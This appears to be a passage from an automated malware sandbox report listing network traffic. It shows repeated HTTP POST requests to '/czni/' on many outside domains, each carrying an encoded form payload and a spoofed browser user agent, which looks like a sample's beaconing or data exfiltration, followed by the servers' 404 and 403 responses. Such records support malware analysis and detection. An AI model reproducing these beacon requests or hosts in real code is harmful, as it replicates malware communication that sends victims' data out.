          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.genuineinsights.cloudConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.genuineinsights.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.genuineinsights.cloud/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 35 34 49 6f 58 33 46 77 65 4d 6d 63 65 66 47 35 74 67 49 49 67 53 32 37 46 30 65 65 36 2d 79 5a 55 4a 43 37 4e 67 49 5a 4f 57 45 37 38 5a 79 79 50 51 64 64 33 38 65 50 50 73 69 6a 38 50 51 65 74 61 31 6c 77 67 7e 57 67 32 78 34 54 6d 63 4b 59 6c 34 72 50 6f 61 73 34 59 59 65 66 33 52 51 39 37 4e 4e 75 6d 52 53 64 79 32 63 39 61 67 71 54 49 45 5f 54 6b 66 68 77 76 34 37 43 65 42 34 4d 49 37 52 50 78 76 72 5a 59 77 68 6e 62 56 5f 51 6b 50 54 35 4e 38 44 57 38 47 46 6d 76 6a 77 73 66 63 71 70 2d 50 48 61 46 5a 37 63 7a 48 58 48 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=54IoX3FweMmcefG5tgIIgS27F0ee6-yZUJC7NgIZOWE78ZyyPQdd38ePPsij8PQeta1lwg~Wg2x4TmcKYl4rPoas4YYef3RQ97NNumRSdy2c9agqTIE_Tkfhwv47CeB4MI7RPxvrZYwhnbV_QkPT5N8DW8GFmvjwsfcqp-PHaFZ7czHXHQ).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.44yyds.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.44yyds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.44yyds.com/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 4f 42 66 72 49 52 31 4f 30 52 70 77 78 7a 48 42 7a 51 74 6c 4a 49 6f 7a 68 6d 6d 35 32 31 72 46 74 59 74 52 4e 62 67 77 6a 38 6d 43 59 4e 30 42 4e 37 38 6d 6a 77 34 71 65 66 4c 7a 71 6d 39 6f 64 42 59 57 68 50 69 30 68 49 45 6b 4a 4d 7a 74 35 4b 74 42 4d 57 79 6d 4b 64 45 6c 39 44 30 66 62 46 37 4b 67 70 43 71 35 33 72 58 7a 61 58 4d 45 49 6a 52 7e 59 74 62 72 42 45 68 73 68 69 56 4c 68 38 42 45 52 6b 68 45 37 75 77 75 79 34 47 38 41 43 6c 4a 72 36 37 46 48 73 79 5a 67 36 7a 33 43 71 50 68 7a 66 65 4d 58 6f 50 58 44 48 6c 49 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=OBfrIR1O0RpwxzHBzQtlJIozhmm521rFtYtRNbgwj8mCYN0BN78mjw4qefLzqm9odBYWhPi0hIEkJMzt5KtBMWymKdEl9D0fbF7KgpCq53rXzaXMEIjR~YtbrBEhshiVLh8BERkhE7uwuy4G8AClJr67FHsyZg6z3CqPhzfeMXoPXDHlIA).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.yeah-go.comConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.yeah-go.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.yeah-go.com/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 41 44 7a 72 59 35 6d 5a 6e 6e 6d 41 7e 6f 76 71 49 49 50 4b 33 5a 72 50 38 73 49 63 59 64 6e 36 65 6b 46 53 46 38 71 71 6e 46 52 58 68 70 6a 44 47 66 55 76 71 39 31 39 51 51 33 59 47 4e 48 62 41 30 59 65 30 75 4a 49 34 41 33 31 6d 53 5a 76 72 57 61 5f 55 4d 31 51 32 52 41 6a 34 39 49 47 7a 47 51 37 62 30 39 4d 72 34 41 56 6d 62 44 6d 53 6c 4c 72 45 72 61 78 48 77 28 51 5a 6f 38 68 73 53 72 67 67 4c 7a 4b 38 32 76 52 37 64 73 68 46 65 4d 79 4d 65 76 53 53 64 54 76 5a 57 69 48 72 54 39 33 32 74 52 39 56 38 30 5f 6d 6a 44 45 55 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=ADzrY5mZnnmA~ovqIIPK3ZrP8sIcYdn6ekFSF8qqnFRXhpjDGfUvq919QQ3YGNHbA0Ye0uJI4A31mSZvrWa_UM1Q2RAj49IGzGQ7b09Mr4AVmbDmSlLrEraxHw(QZo8hsSrggLzK82vR7dshFeMyMevSSdTvZWiHrT932tR9V80_mjDEUg).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.frogair.onlineConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.frogair.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frogair.online/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 30 71 35 6e 58 6b 7e 59 61 72 28 4b 64 63 75 30 36 71 53 41 68 73 49 34 37 4c 31 57 30 5f 53 73 7a 4e 7a 58 4a 71 7a 6d 61 35 51 55 34 42 41 58 4e 69 51 7a 31 31 43 72 53 4a 4b 56 71 58 51 51 49 4e 77 58 68 44 46 4b 34 62 43 34 70 7a 5a 79 46 38 43 56 77 6e 28 72 79 37 52 4b 4c 61 78 44 42 56 6e 46 4f 4d 32 64 76 43 4f 57 45 57 76 36 57 45 4c 48 55 70 50 57 36 64 51 6b 50 62 78 4e 74 63 6e 64 50 4e 44 6b 74 75 31 52 65 57 36 4a 42 6d 35 2d 47 38 78 41 35 75 49 74 56 50 77 6d 28 73 56 71 4f 67 4d 67 70 72 59 31 7e 4e 6d 44 6d 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=0q5nXk~Yar(Kdcu06qSAhsI47L1W0_SszNzXJqzma5QU4BAXNiQz11CrSJKVqXQQINwXhDFK4bC4pzZyF8CVwn(ry7RKLaxDBVnFOM2dvCOWEWv6WELHUpPW6dQkPbxNtcndPNDktu1ReW6JBm5-G8xA5uItVPwm(sVqOgMgprY1~NmDmQ).
          Source: global trafficHTTP traffic detected: POST /czni/ HTTP/1.1Host: www.deglaz.xyzConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.deglaz.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.deglaz.xyz/czni/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 38 72 75 6c 2d 6e 3d 28 36 50 36 51 52 65 45 37 39 53 4a 42 6d 43 75 4c 4e 73 46 4d 36 56 57 68 6d 7e 61 67 52 52 57 46 55 42 37 69 4c 73 5a 54 38 77 53 6d 57 65 55 74 46 38 79 51 37 32 43 38 6a 6e 75 79 72 65 6f 30 78 66 35 65 58 68 53 70 77 4d 73 28 77 63 53 67 4c 64 63 57 34 6e 54 45 37 76 38 54 38 42 49 32 62 70 44 7a 7a 45 4e 51 34 63 58 53 64 53 42 50 4b 4b 30 6c 39 4e 63 35 44 57 32 52 45 4a 56 53 4d 5a 33 6e 4e 66 6e 4d 33 62 53 71 33 61 53 6e 71 48 7a 75 42 6e 59 36 53 77 57 75 6e 72 47 75 67 47 67 74 6d 43 54 75 58 33 38 65 61 68 56 58 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: z8rul-n=(6P6QReE79SJBmCuLNsFM6VWhm~agRRWFUB7iLsZT8wSmWeUtF8yQ72C8jnuyreo0xf5eXhSpwMs(wcSgLdcW4nTE7v8T8BI2bpDzzENQ4cXSdSBPKK0l9Nc5DW2REJVSMZ3nNfnM3bSq3aSnqHzuBnY6SwWunrGugGgtmCTuX38eahVXQ).
          Source: global traffic
          HTTP traffic detected: POST /czni/ HTTP/1.1
              Host: www.laylaroseuk.com
              Connection: close
              Content-Length: 189
              Cache-Control: no-cache
              Origin: http://www.laylaroseuk.com
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.laylaroseuk.com/czni/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Ascii: z8rul-n=PGhZS2c5cUz7VcIYJXaGe-NX6v3Ydtg2A5crLmVVbLoYL7zjjIoV8VfeL45UzySSGdSLOwxfmg61NT3hR3(dm5UHggB7SUPHFHeeQ8USw50llSc-FCPrpSomK9ZhSa4R6qlbHnJLTgPAGVU7(r6FeBwFEF(fSD2jlLYtZ22DcwiAOR7lcQ).
          Source: global traffic
          HTTP traffic detected: POST /czni/ HTTP/1.1
              Host: www.lakeviewautomation.com
              Connection: close
              Content-Length: 189
              Cache-Control: no-cache
              Origin: http://www.lakeviewautomation.com
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.lakeviewautomation.com/czni/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Ascii: z8rul-n=Cnd_50Q66ioZMceURGpCOZ4DMcewJgYnFtgI8mx1EqkI7RX_oUsjoWCNob3iRQ1anOK0AXgtwlKMBMHjCcl9R0qvXCZN1bbntAu3cHGo8k1aPscW~0fpPpBY(Kyk3o5f2-89neZeeH6wuWRZuTj7GTkmTDWhHCpGRDjZGsXddBQ0X3Qrgw).
          Source: global traffic
          HTTP traffic detected: POST /czni/ HTTP/1.1
              Host: www.dellaone.com
              Connection: close
              Content-Length: 189
              Cache-Control: no-cache
              Origin: http://www.dellaone.com
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.dellaone.com/czni/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Ascii: z8rul-n=khB9J2436-n4QOyv1af5uJKcFOu3eRyu4aODjMfRIj9voQTLSKglJ_TZW9KzajIE8rF8KRbkrWhut86h2nP4Zh5kM30GhM9I(FH1oLxNu8wyMOSTdF2AdZgxuOCtvQXncppxRTKsKWImAYXRyk(48e4pUt8kwOv69BlAoODhtE1oZaz1Tw).
          Source: global traffic
          HTTP traffic detected: POST /czni/ HTTP/1.1
              Host: www.arritalvigo.com
              Connection: close
              Content-Length: 189
              Cache-Control: no-cache
              Origin: http://www.arritalvigo.com
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.arritalvigo.com/czni/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Ascii: z8rul-n=2AGTLNFRrjrvueHiptRviaM3n95bHr44nTpixTzNgfPfGPd-~ELbE_iU~Hd8Lyv2qqu5~WEWBKRxT01pTvH7Z9FY(9dONQKODlxvje11AFEckcUux0tUPZ48kdiXoZX7OCSIAbFIksjelgjs1fGs1uYlrBjKJ4T68CZMzCkPzPSdYNxKlw).
          Source: global traffic
          HTTP traffic detected: POST /czni/ HTTP/1.1
              Host: www.versusfinances.tech
              Connection: close
              Content-Length: 189
              Cache-Control: no-cache
              Origin: http://www.versusfinances.tech
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.versusfinances.tech/czni/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Ascii: z8rul-n=ubf6WlENbxkW7DQQ98X0bUBo5GmsRxH9glEUQSZ66lOJgbzFMzbaoZWdUmWRhmVO(7K1ynWqk0UWPF3Yn2AM8uGESexcH0Ogh0w7CBB9zJrGSFEI1Pw86jqp0J1a3-oPHEOfcIgtx6dRaijg7NmYxf~QhoATv-GG1FSK6lYdxEGQHl4UXQ).
          Source: global traffic
          HTTP traffic detected: POST /czni/ HTTP/1.1
              Host: www.hayethe.site
              Connection: close
              Content-Length: 189
              Cache-Control: no-cache
              Origin: http://www.hayethe.site
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.hayethe.site/czni/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Ascii: z8rul-n=aY3s~Zzc8XDc2t7khO4sSbU0u57HBwd0X48p2F~JllnwRjiT85Tfj2QfWCXmjJ2i~pokBYqU~JHvVWXm2MnWy5D_ZVL_F3ed3eA9~Eq11fQ4MCFvixb53K(Oix58SksMwXcJM4e0FisdCuzwFgZ_ZuADEZZEvULFkhHtoSUu4JJ8cRoHsw).
          Source: global traffic
          HTTP traffic detected: POST /czni/ HTTP/1.1
              Host: www.octohoki.net
              Connection: close
              Content-Length: 189
              Cache-Control: no-cache
              Origin: http://www.octohoki.net
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.octohoki.net/czni/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Ascii: z8rul-n=1gqeWzVyqVP4S0wfhHhgKBr5erb_8e(qrmo2J2RT6-I34kv4kiGjxpDejoxDXcIGaHXfqfJaxVGTiqt6mjHnMKP-yO88Q9flGmLythU0R3lC7z2k3Z~1wcHAT7TlrFgcyLfFYPXdhSjnIywaFaGoWrT6btJMOSyggjFFpvw4Y289QBd2cw).
          Source: global traffic
          HTTP traffic detected: POST /czni/ HTTP/1.1
              Host: www.hougou.ru
              Connection: close
              Content-Length: 189
              Cache-Control: no-cache
              Origin: http://www.hougou.ru
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.hougou.ru/czni/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Ascii: z8rul-n=BsOLTqK-6qWQmHA35s5odTZLPzKAJnVSdc4DqLrWQpgCdDujtwbXY-xytFhee9duvIMEn7RoaoaLumV-X9zJukf0cI9n2w3kTOlayPYSENcwI4v3d5u0~Ic2HPqq5psRxQFS6msoaZf-bfx7Fc6iDwD1Rmt2l1E2gepztyE8Q2HtBaf2ZA).
          Source: unknown
          Network traffic detected: IP country count 11
          Source: unknown
          Network traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknown
          Network traffic detected: HTTP traffic on port 443 -> 49703
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 30 Jan 2023 12:39:50 GMT
              Content-Type: text/html
              Content-Length: 146
              Connection: close
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 30 Jan 2023 12:40:00 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Content-Encoding: gzip
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Server: nginx
              Date: Mon, 30 Jan 2023 12:40:03 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 30 Jan 2023 12:40:19 GMT
              Content-Type: text/html
              Content-Length: 867
              Connection: close
              Server: Apache/2
              Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
              Accept-Ranges: bytes
              Age: 0
              Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 30 Jan 2023 12:40:23 GMT
              Content-Type: text/html
              Content-Length: 867
              Connection: close
              Server: Apache/2
              Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
              Accept-Ranges: bytes
              Age: 0
              Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 30 Jan 2023 12:40:30 GMT
              Server: Apache
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Last-Modified: Fri, 18 Feb 2022 06:24:03 GMT
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Content-Encoding: gzip
              Content-Length: 358
              Content-Type: text/html
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 30 Jan 2023 12:40:34 GMT
              Server: Apache
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Last-Modified: Fri, 18 Feb 2022 06:24:03 GMT
              Accept-Ranges: bytes
              Content-Length: 583
              Vary: Accept-Encoding
              Content-Type: text/html
              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 30 Jan 2023 12:40:48 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              X-Sorting-Hat-PodId: 315
              X-Sorting-Hat-ShopId: 71134478652
              Vary: Accept-Encoding
              Vary: Accept
              X-Frame-Options: DENY
              X-ShopId: 71134478652
              X-ShardId: 315
              X-Shopify-Generated-Cart-Token: 21c7ae2ca548800573490a93ab93ff69
              Content-Language: pt-BR
              Cache-Control: no-store
              Set-Cookie: localization=BR; path=/; expires=Tue, 30 Jan 2024 12:40:48 GMT; SameSite=Lax
              Set-Cookie: cart_sig=3daa84b1ccd12f91044bf3d820ae05bb; path=/; expires=Mon, 13 Feb 2023 12:40:48 GMT; HttpOnly; SameSite=Lax
              Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22BR%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=yeah-go.com; path=/; expires=Tue, 31 Jan 2023 12:40:48 GMT; SameSite=Lax
              Set-Cookie: _y=4b96e5d2-3055-4f89-a324-3dc0f29e3023; Expires=Tue, 30-Jan-24 12:40:48 GMT; Domain=yeah-go.com; Path=/; SameSite=Lax
              Set-Cookie: _s=6d163f85-2949-4a42-b4ce-e10617e163d7; Expires=Mon, 30-Jan-23 13:10:48 GMT; Domain=yeah-go.com; Path=/; SameSite=Lax
              Set-Cookie: _shopify_y=4b96e5d2-3055-4f89-a324-3dc0f29e3023; Expires=Tue, 30-Jan-24 12
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 403 Forbidden
              Date: Mon, 30 Jan 2023 12:40:51 GMT
              Content-Type: text/html
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              X-Sorting-Hat-PodId: 315
              X-Sorting-Hat-ShopId: 71134478652
              X-Dc: gcp-europe-west3
              X-Request-ID: aca3630a-5f6f-4e43-87f3-b653ec267e18
              X-XSS-Protection: 1; mode=block
              X-Download-Options: noopen
              X-Content-Type-Options: nosniff
              X-Permitted-Cross-Domain-Policies: none
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvle4kgU20ZKzDTCZqnGDCg84KaskuIHELm853b%2FgasafBl0arBl%2FEvQXlSfKid125VO3dam81P%2B4h%2BU%2B9doD56%2BtDqU3pv4DJqkUuD6M0tOjSjy7t19uWYDuv1mXzEFCg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
              Server-Timing: cfRequestDuration;dur=69.000006
              Server: cloudflare
              CF-RAY: 791a47497b3f6933-FRA
              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
              Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 30 Jan 2023 12:40:57 GMT
              Server: Apache/2.4.54 (Unix)
              Content-Length: 196
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 30 Jan 2023 12:41:00 GMT
              Server: Apache/2.4.54 (Unix)
              Content-Length: 196
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 30 Jan 2023 12:41:06 GMT
          Server: Apache
          Content-Length: 16026
          Connection: close
          Content-Type: text/html
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 30 Jan 2023 12:41:08 GMT
          Server: Apache
          Content-Length: 16026
          Connection: close
          Content-Type: text/html; charset=utf-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Mon, 30 Jan 2023 12:41:14 GMT
          Content-Type: text/html
          Content-Length: 146
          Connection: close
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Mon, 30 Jan 2023 12:41:16 GMT
          Content-Type: text/html
          Content-Length: 146
          Connection: close
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          x-powered-by: PHP/7.4.33
          expires: Wed, 11 Jan 1984 05:00:00 GMT
          cache-control: no-cache, must-revalidate, max-age=0
          content-type: text/html; charset=UTF-8
          link: <https://lakeviewautomation.com/wp-json/>; rel="https://api.w.org/"
          transfer-encoding: chunked
          content-encoding: gzip
          vary: Accept-Encoding
          date: Mon, 30 Jan 2023 12:41:24 GMT
          server: LiteSpeed
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 30 Jan 2023 12:41:32 GMT
          Server: Apache
          Expires: Wed, 11 Jan 1984 05:00:00 GMT
          Cache-Control: no-cache, must-revalidate, max-age=0
          X-UA-Compatible: IE=edge
          Link: <https://londondairysupply.com/wp-json/>; rel="https://api.w.org/"
          Upgrade: h2,h2c
          Connection: Upgrade, close
          Vary: Accept-Encoding,User-Agent
          Transfer-Encoding: chunked
          Content-Type: text/html; charset=UTF-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 30 Jan 2023 12:41:35 GMT
          Server: Apache
          Expires: Wed, 11 Jan 1984 05:00:00 GMT
          Cache-Control: no-cache, must-revalidate, max-age=0
          X-UA-Compatible: IE=edge
          Link: <https://londondairysupply.com/wp-json/>; rel="https://api.w.org/"
          Upgrade: h2,h2c
          Connection: Upgrade, close
          Vary: Accept-Encoding,User-Agent
          Transfer-Encoding: chunked
          Content-Type: text/html; charset=UTF-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Date: Mon, 30 Jan 2023 12:41:46 GMT
          Server: Apache
          X-Frame-Options: deny
          Content-Encoding: gzip
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Content-Type: text/html
          Content-Length: 1271
          Connection: close
          Date: Mon, 30 Jan 2023 12:41:49 GMT
          Server: Apache
          X-Frame-Options: deny
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          content-type: text/html
          content-length: 244
          content-encoding: gzip
          vary: Accept-Encoding,User-Agent
          date: Mon, 30 Jan 2023 12:41:54 GMT
          server: LiteSpeed
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          content-type: text/html
          content-length: 611
          date: Mon, 30 Jan 2023 12:41:57 GMT
          server: LiteSpeed
          vary: User-Agent
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /czni/?20=4xfPiv3RnE&amp;z8rul-n=jZ3aVVsOPCQ8zDolwfPMJ0FgyASOdlT+pUUZWGluxzeJivrfCzX4+7jeTlPikh1G7PP+5G6V9EQpGQT3uHsK4bLie7FdC0b4pw== was not found on this server.<HR><I>www.versusfinances.tech</I></BODY></HTML>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          date: Mon, 30 Jan 2023 12:42:07 GMT
          server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30
          content-length: 203
          content-type: text/html; charset=iso-8859-1
          connection: close
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /czni/ was not found on this server.</p></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          date: Mon, 30 Jan 2023 12:42:09 GMT
          server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.0.30
          content-length: 203
          content-type: text/html; charset=iso-8859-1
          connection: close
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /czni/ was not found on this server.</p></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 30 Jan 2023 12:42:15 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qli%2BxEDjmLkYhchRvDrr074cTc9eMZY83d73NAVWZzvTZwZhsWIlzncpTM4l3hJ1RrfIspzXd%2BqHuWC4038gwPm6w68qgBI8OHSEyQncXNeI7C8UmvAIBsEEaOmHCDGcTD%2B3"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 791a4953bf1106e5-LHR
          Content-Encoding: gzip
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 30 Jan 2023 12:42:17 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Accept-Ranges: bytes
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7%2BsKB3TdwtpE%2FkxJI0cv7MJgObb8a3UJf4PnZaGfmHBpE61FYhi6JD%2FJhhbo%2Fu%2FXC7tZwRPM8r6K8BmXzULATwGj3qTqGV2XHL2b46jrFl%2FnGDeV17bC8DEBCvP%2BYyK595T3"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 791a4963a82e71ed-LHR
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
          Data Ascii: 649<!DOCTYPE html><html lang="en"><head> <title>404 PAGE NOT FOUND</title> <!-- Meta --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta content="width=1200, initial-scale=1" name="viewport"> <!-- <meta content="viewport" content="width=1200"> --> <meta content="" name="description">
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 30 Jan 2023 12:42:23 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
